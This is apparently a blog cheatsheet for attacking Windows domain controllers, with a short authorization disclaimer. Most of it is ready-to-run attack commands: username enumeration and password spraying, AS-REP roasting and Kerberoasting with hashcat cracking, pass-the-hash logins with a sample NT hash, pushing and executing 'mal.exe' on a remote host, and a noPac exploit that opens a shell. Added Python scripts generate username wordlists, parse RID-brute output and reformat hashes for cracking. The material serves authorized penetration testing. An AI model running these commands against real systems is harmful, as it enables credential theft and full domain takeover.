Pentesting Domain Controllers Cheatsheet

In this blog post, we share a cheatsheet for pentesting domain controllers. Why a dedicated guide? Because domain controllers hold your organization's most sensitive data - user credentials, group policies and the rest of the directory - and a domain controller that is not secured properly is one step away from a full domain takeover, not just a data breach.

So buckle up as we walk through the techniques and tools for testing the security of a domain controller, from identifying potential weaknesses to exploiting them, with practical command examples and the checks a tester actually runs.


Note: Before proceeding with pentesting any system, it is essential to have proper authorization from concerned authorities and follow ethical guidelines. Happy learning!


This is just a brief guide on what and how to pentest a domain controller without digging too deep. If you are looking for a comprehensive guide, refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESS and ACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES.

DNS

# Locate the domain's LDAP servers (SRV record)
dig +short srv _ldap._tcp.domain.com @DC_IP

# Locate the domain controllers specifically (DC locator record)
dig +short srv _ldap._tcp.dc._msdcs.domain.com @DC_IP

# Resolve a DC hostname returned above
dig +short a rootdc.domain.com @DC_IP

SMB Shares Enumeration 

# List shares
smbclient -L //10.10.10.10/

#List Shares via Null Authentication
smbclient -N -L //10.10.10.10/ 

#Access the contents of the share 
smbclient \\\\10.10.10.10\\share$ 

#List files inside a share (empty username = null session)
smbclient //friendzone.htb/general -U "" 

#Download a file
get filename.txt

#Once you are inside SMB interactive session - to download all files 
mget *

#Once you are inside SMB interactive session - to upload a file 
put filename

#Using a Kerberos ticket (KRB5CCNAME) with smbclient; -k is deprecated in newer Samba, use --use-kerberos=required there
smbclient -k -L //dc01.domain.local/ 

#Shell using smb with creds 
psexec.py administrator@10.10.10.10

#Login using SMB MAP
smbmap -u Administrator -p 'Password@1' -H 10.10.10.10
Download All the files Recursively from a Share:

smbclient '\\IP_ADDRESS\Share' -N -c 'prompt OFF;recurse ON;mget *'

or  
  smbclient '\\server\share'
  mask ""
  recurse ON
  prompt OFF
  cd 'path\to\remote\dir'               //Can Skip
  lcd '~/path/to/download/to/'          //Can Skip
  mget *

LDAP Enum

#Nmap Scan for basic info
nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10

#Get Domain name (anonymous base query; -h is deprecated in newer ldapsearch, prefer -H ldap://)
ldapsearch -x -h 10.10.10.10 -s base namingcontexts
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts

#Look for misconfigs - readable LAPS passwords (ms-MCS-AdmPwd is only returned if the bind account has read rights on it)
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

#Dump Everything
ldapsearch -LLL -x -H ldap://DOMAIN.FQDN.COM -b "DC=domain,DC=fqdn,DC=com" "(objectClass=*)"

#Dump Everything using ldeep (-a = anonymous bind; use -u/-p or -k with creds)
ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump

UserEnum

The objective is to gather as many valid usernames as possible. Work out the username format the organization uses from its email addresses or via social engineering, then build a wordlist in that format.

Example name: John Smith
Possible usernames: John.Smith, JohnS, SJohn, SmithJ, JSmith, John.S

The git repo below has ready-made name lists you can use as a starting point for your own list:

git clone https://github.com/Bhanunamikaze/Wordlists.git
cd Wordlists/Usernames

# User Enumeration to find valid usernames (the KDC's pre-auth error differs for existing and non-existing accounts)
kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt

#Password Spray with a known password (check the lockout policy first)
kerbrute passwordspray --dc 10.10.10.10 -d domain.local -v usernames.txt 'Kn0wnPaSSW0rd!'
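As an added example (not part of the original post), here is a small Python generator for the username formats listed above; the FORMATS set, the gen_usernames / build_wordlist names and the sample names are mine, and the output is meant to be fed to kerbrute userenum:

```python
import re

# Added example, not from the original post: build a username wordlist for
# kerbrute userenum from real names. FORMATS covers the variants listed above
# (John.Smith, JohnS, SJohn, SmithJ, JSmith, John.S) plus a few other common
# AD conventions; trim it once you know which one the target uses, since every
# extra format multiplies the Kerberos requests you send to the DC.
FORMATS = (
    "{first}.{last}",   # john.smith
    "{first}{l}",       # johns
    "{l}{first}",       # sjohn
    "{last}{f}",        # smithj
    "{f}{last}",        # jsmith
    "{first}.{l}",      # john.s
    "{f}.{last}",       # j.smith
    "{first}{last}",    # johnsmith
    "{last}.{first}",   # smith.john
    "{first}",          # john
)


def _clean(token: str) -> str:
    """Lower-case a name part and drop characters that will not appear in a login name."""
    return re.sub(r"[^a-z0-9]", "", token.lower())


def gen_usernames(full_name: str, formats=FORMATS) -> list:
    """Return de-duplicated username candidates for one 'First [Middle] Last' name.

    Middle names are ignored; a single-token name is returned as-is; an empty
    or unusable name yields an empty list.
    """
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    seen, out = set(), []
    for fmt in formats:
        cand = fmt.format(first=first, last=last, f=first[0], l=last[0])
        if cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


def build_wordlist(names) -> list:
    """Flatten candidates for many names, first-seen order, no duplicates
    (John Smith and Jon Smith both produce 'jsmith'; it is written once)."""
    seen, out = set(), []
    for name in names:
        for cand in gen_usernames(name):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    # Constructed sample input; in practice read names from an OSINT scrape.
    for user in build_wordlist(["John Smith", "Jane O'Brien", "Jon Smith"]):
        print(user)
```

Redirect the output to a file and pass it to kerbrute userenum; once one format is confirmed valid, cut FORMATS down to that one so the spray against the DC stays small.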

Finding Users Using Netexec

#Use Netexec to find users by brute forcing RIDs (works with Guest / anonymous only if those are enabled on the DC)
#Collect the usernames, then either brute force passwords or look for pre-auth-disabled users
nxc smb 10.10.10.10 -u 'Guest' -p '' --rid-brute
nxc smb 10.10.10.10 -u 'anonymous' -p '' --rid-brute > output.txt
crackmapexec smb domain.local -u "user" -p "pass" --rid-brute | grep SidTypeUser

#Grep for usernames (note: the second cut truncates names that contain a space, and machine accounts ending in $ are kept)
cat output.txt | grep "SidTypeUser" | cut -d "\\" -f2 | cut -d " " -f1 > user.txt

#Brute force usernames with a known password
nxc smb 10.10.10.10 -u users.txt -p 'P@SSW)rd!'

#Brute force with a known username
nxc smb 10.10.10.10 -u 'UserNameHere' -p passwords.txt

#List users
nxc smb 10.10.10.10 -u 'Username' -p 'P@ssw0rd!' --users

#Create BloodHound collection (with a Kerberos ticket in KRB5CCNAME, or with a password)
netexec ldap 10.10.10.10 -u username@domain.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10
netexec ldap 10.10.10.10 -u username@domain.local -p 'P@ssw0rd!' --bloodhound --collection All --dns-server 10.10.10.10

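The grep/cut pipeline above truncates any name that contains a space and keeps machine accounts (names ending in $). As an added example (not from the original post), this Python parser does the same extraction more carefully; the SAMPLE_OUTPUT lines, domain, hostname and RIDs are constructed to mirror the tool's line layout, and the function names are mine:

```python
import re
from typing import List, NamedTuple

# Added example, not from the original post: turn `nxc smb ... --rid-brute`
# output into a clean user list. SAMPLE_OUTPUT is constructed to mirror the
# tool's line layout; the domain, host and RIDs are made up.
SAMPLE_OUTPUT = r"""
SMB         10.10.10.10     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:domain.local) (signing:True) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [+] domain.local\Guest:
SMB         10.10.10.10     445    DC01             500: DOMAIN\Administrator (SidTypeUser)
SMB         10.10.10.10     445    DC01             501: DOMAIN\Guest (SidTypeUser)
SMB         10.10.10.10     445    DC01             512: DOMAIN\Domain Admins (SidTypeGroup)
SMB         10.10.10.10     445    DC01             1000: DOMAIN\DC01$ (SidTypeUser)
SMB         10.10.10.10     445    DC01             1105: DOMAIN\j.smith (SidTypeUser)
SMB         10.10.10.10     445    DC01             1106: DOMAIN\svc sql (SidTypeUser)
"""

# "<rid>: DOMAIN\name (SidTypeXxx)" -- the name is matched lazily so spaces survive
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)


class SidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str


def parse_rid_brute(output: str) -> List[SidEntry]:
    """Extract every RID/name/type tuple; banner and status lines are skipped."""
    entries = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if m:
            entries.append(SidEntry(int(m["rid"]), m["domain"], m["name"], m["type"]))
    return entries


def user_accounts(entries, include_machines: bool = False) -> List[str]:
    """Names of SidTypeUser objects. Machine accounts (trailing '$') are dropped
    by default: they are useless for spraying or AS-REP roasting."""
    return [
        e.name
        for e in entries
        if e.sid_type == "SidTypeUser" and (include_machines or not e.name.endswith("$"))
    ]


def write_users(entries, path: str) -> int:
    """Write one username per line (the users.txt fed to kerbrute / nxc); returns the count."""
    users = user_accounts(entries)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(users) + "\n")
    return len(users)


if __name__ == "__main__":
    import sys
    # Read the tool's output from a pipe; fall back to the constructed sample when run by hand.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    print("\n".join(user_accounts(parse_rid_brute(text))))
```

Saved as, for example, parse_rids.py (a name I chose), it slots into the pipeline as `nxc smb 10.10.10.10 -u Guest -p '' --rid-brute | python3 parse_rids.py > users.txt`; the RIDs are kept in SidEntry so you can also spot accounts created recently (high RIDs) or the built-in ones (below 1000).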
User Enum using TGT 

#Request a TGT
impacket-getTGT domain.local/USERName:'P@SSW)RD1' -dc-ip 10.10.10.10

#add the TGT PATH to Env Variables 
export KRB5CCNAME=$(pwd)/USERName.ccache

#RID Brute - use DC Address here as it tries to find the realm
netexec smb dc01.domain.local  -u Username -k --use-kcache  --rid-brute

#Grep Users and save it to users.txt 
netexec smb dc01.domain.local  -u Username -k --use-kcache  --rid-brute | grep "SidTypeUser" | cut -d "\\" -f2 | cut -d " " -f1 > users.txt

#Create Bloodhound Collection
netexec ldap 10.10.10.10 -u username@domain.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10

Find Pre-Auth Disabled Users

#Request AS-REP hashes for every user in the list that has pre-auth disabled (impacket; output is hashcat format by default, use -format john for john)
GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10

#AD Module - Finding users with DoesNotRequirePreAuth set
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

#Copy the hash and crack it using John
john krbhash --wordlist=wordlist.txt

#Cracking using Hashcat (mode 18200 = Kerberos 5 AS-REP, etype 23); add $23 after $krb5asrep if you did not export the hash in hashcat format
hashcat -m 18200 hash -a 0 rockyou.txt
hashcat -m 18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force
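The "$23" remark above is the only difference between the two hash layouts GetNPUsers.py can emit. As an added example (not from the original post), this Python helper detects which layout a line is in and converts between them, so one output file can be fed to both john and hashcat -m 18200; the function names and the sample hash (random-looking hex, not a real capture) are mine:

```python
import re
from typing import List, Optional

# Added example, not from the original post. Both layouts impacket's
# GetNPUsers.py can write:
#   hashcat: $krb5asrep$23$user@REALM:<32 hex checksum>$<hex edata2>
#   john:    $krb5asrep$user@REALM:<32 hex checksum>$<hex edata2>
# The only difference is the "$23$" encryption-type marker.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?"      # optional etype marker (hashcat layout)
    r"(?P<principal>[^$:@]+@[^$:]+):"           # user@REALM
    r"(?P<checksum>[0-9a-fA-F]{32})\$"          # 16-byte checksum
    r"(?P<edata2>[0-9a-fA-F]+)$"                # encrypted part of the AS-REP
)

# Only the RC4 (etype 23) layout is covered here; AES AS-REP hashes use a
# different layout and a different hashcat mode.
HASHCAT_MODES = {23: 18200}

# Constructed sample (random-looking hex, not a real capture).
SAMPLE_HASHCAT = (
    "$krb5asrep$23$svc_backup@STEINS.LOCAL:"
    "0123456789abcdef0123456789abcdef$" + "deadbeef" * 8
)
SAMPLE_JOHN = SAMPLE_HASHCAT.replace("$krb5asrep$23$", "$krb5asrep$", 1)


def parse_asrep(line: str) -> Optional[dict]:
    """Split a hash into its fields, or None if the line is not an AS-REP hash.
    The john layout carries no etype, which means RC4 (23)."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"]) if fields["etype"] else 23
    return fields


def to_hashcat(line: str) -> str:
    f = parse_asrep(line)
    if f is None:
        raise ValueError("not an AS-REP hash: %r" % line[:40])
    return "$krb5asrep${etype}${principal}:{checksum}${edata2}".format(**f)


def to_john(line: str) -> str:
    f = parse_asrep(line)
    if f is None:
        raise ValueError("not an AS-REP hash: %r" % line[:40])
    if f["etype"] != 23:
        raise ValueError("only the etype 23 (RC4) layout is handled here")
    return "$krb5asrep${principal}:{checksum}${edata2}".format(**f)


def hashcat_mode(line: str) -> int:
    """hashcat -m value for the hash, or ValueError for AES / malformed input."""
    f = parse_asrep(line)
    if f is None or f["etype"] not in HASHCAT_MODES:
        raise ValueError("unsupported or malformed hash")
    return HASHCAT_MODES[f["etype"]]


def convert_file(lines, target: str = "hashcat") -> List[str]:
    """Normalise a whole output file; non-hash lines (banners, errors) are dropped."""
    conv = to_hashcat if target == "hashcat" else to_john
    return [conv(l) for l in lines if parse_asrep(l) is not None]


if __name__ == "__main__":
    import sys
    for out in convert_file(sys.stdin, sys.argv[1] if len(sys.argv) > 1 else "hashcat"):
        print(out)
```

Run it as `python3 asrep_fmt.py hashcat < hash.txt > hash.hc` (file name mine); GetNPUsers.py also prints "[-] User ... doesn't have UF_DONT_REQUIRE_PREAUTH set" lines to the console, and convert_file drops those if they end up in the input.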

Run Powershell AD Commands with Credentials

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\UserName', $SecPassword)
Get-ADUser -Identity user1 -Credential $Cred
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth -Server 10.10.10.10 -Credential $Cred

Kerberoasting

#Listing users with ServicePrincipalName set using the AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

#Request TGS tickets for all SPN accounts using GetUserSPNs.py (impacket); crack the output with hashcat -m 13100
GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark

Running BloodHound on Linux 

#Match the time with the domain controller (Kerberos rejects tickets if the clock skew is more than 5 minutes)
sudo apt-get install ntpdate
sudo ntpdate <DC IP>

#Add the required hostnames to /etc/hosts if there is no direct DNS 

#Once you have creds for any user, run the BloodHound collector to look for priv esc paths
git clone https://github.com/dirkjanm/BloodHound.py
cd BloodHound.py && pip install .
bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns 10.10.10.10 -c All

Another way is to collect with Netexec:

#Request a TGT
impacket-getTGT domain.local/USERName:'P@SSW)RD1' -dc-ip 10.10.10.10

#add the TGT PATH to Env Variables 
export KRB5CCNAME=$(pwd)/USERName.ccache

#Create Bloodhound Collection
netexec ldap 10.10.10.10 -u username@domain.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10
netexec ldap 10.10.10.10 -u username@domain.local -p 'P@ssw0rd!' --bloodhound --collection All --dns-server 10.10.10.10
Logging In With Creds

1. dir \\hostname.domain.local\c$

2. psexec \\hostname.domain.local cmd.exe 
	
3. $sess = New-PSSession -ComputerName server.steins.local
   Copy-Item -Path C:\Temp\mal.exe -Destination 'C:\mal.exe' -ToSession $sess
   Invoke-Command -ScriptBlock {cmd /c C:\mal.exe } -Session $sess

4. pushd \\server.steins.local\c$   # cmd.exe cannot cd into a UNC path; pushd maps it to a temporary drive letter

5. psexec.py noobs@10.10.10.10

#login with hash (pass-the-hash; evil-winrm takes the NT hash alone with -H, not LM:NT)
6. evil-winrm -i 10.10.10.10 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

7. wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10

8. smbexec.py administrator@10.10.10.10

9. Login with a Kerberos ticket (-r is the realm; evil-winrm needs a matching /etc/krb5.conf)
impacket-getTGT domain.local/USERName:'P@SSW)RD1' -dc-ip 10.10.10.10
export KRB5CCNAME=$(pwd)/USERName.ccache
evil-winrm -i dc01.domain.local -r domain.local

SMB/RPC Access

#Dump the RPC endpoint map with rpcdump.py (impacket); the default is port 135, -p 593 checks RPC over HTTP
rpcdump.py 10.10.10.10
rpcdump.py 10.10.10.10 -p 593

#RPC endpoint enum via Metasploit (set rhosts and run for each module)
msfconsole
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
set rhosts 10.10.10.10
run

SMB Bruteforcing

#Basic SMB & OS info
crackmapexec smb 10.10.10.10

#List Shares
crackmapexec smb 10.10.10.10 --shares

#Passing blank creds via SMB (null session)
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

#Check Guest access
crackmapexec smb 10.10.10.10 -u guest -p ''

#Listing users using RID brute
crackmapexec smb 10.10.10.10 -u guest -p '' --rid-brute

#If the password needs to be changed (expired / must-change-at-next-logon)
smbpasswd -U username -r 10.10.10.10

#Brute forcing SMB creds (mind the lockout policy)
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

#Bruteforcing SMB using hashes (pass-the-hash, line-by-line pairing with --no-bruteforce)
proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success

Check for CVEs

#Exploiting CVE-2021-42278 and CVE-2021-42287 (sAMAccountName spoofing / noPac) to impersonate a DA from a standard domain user; only works if the DC is unpatched and the user can still create machine accounts (ms-DS-MachineAccountQuota > 0)
git clone https://github.com/Ridter/noPac.git
#Check first whether the DC is vulnerable
python3 scanner.py domain.local/User1:'P@ssw0rd1' -dc-ip 10.10.10.10 -use-ldap
#Exploit and drop into a shell
python3 noPac.py domain.local/User1:'P@ssw0rd1' -shell -use-ldap -dc-ip 10.10.10.10


 

Bhanu Namikaze
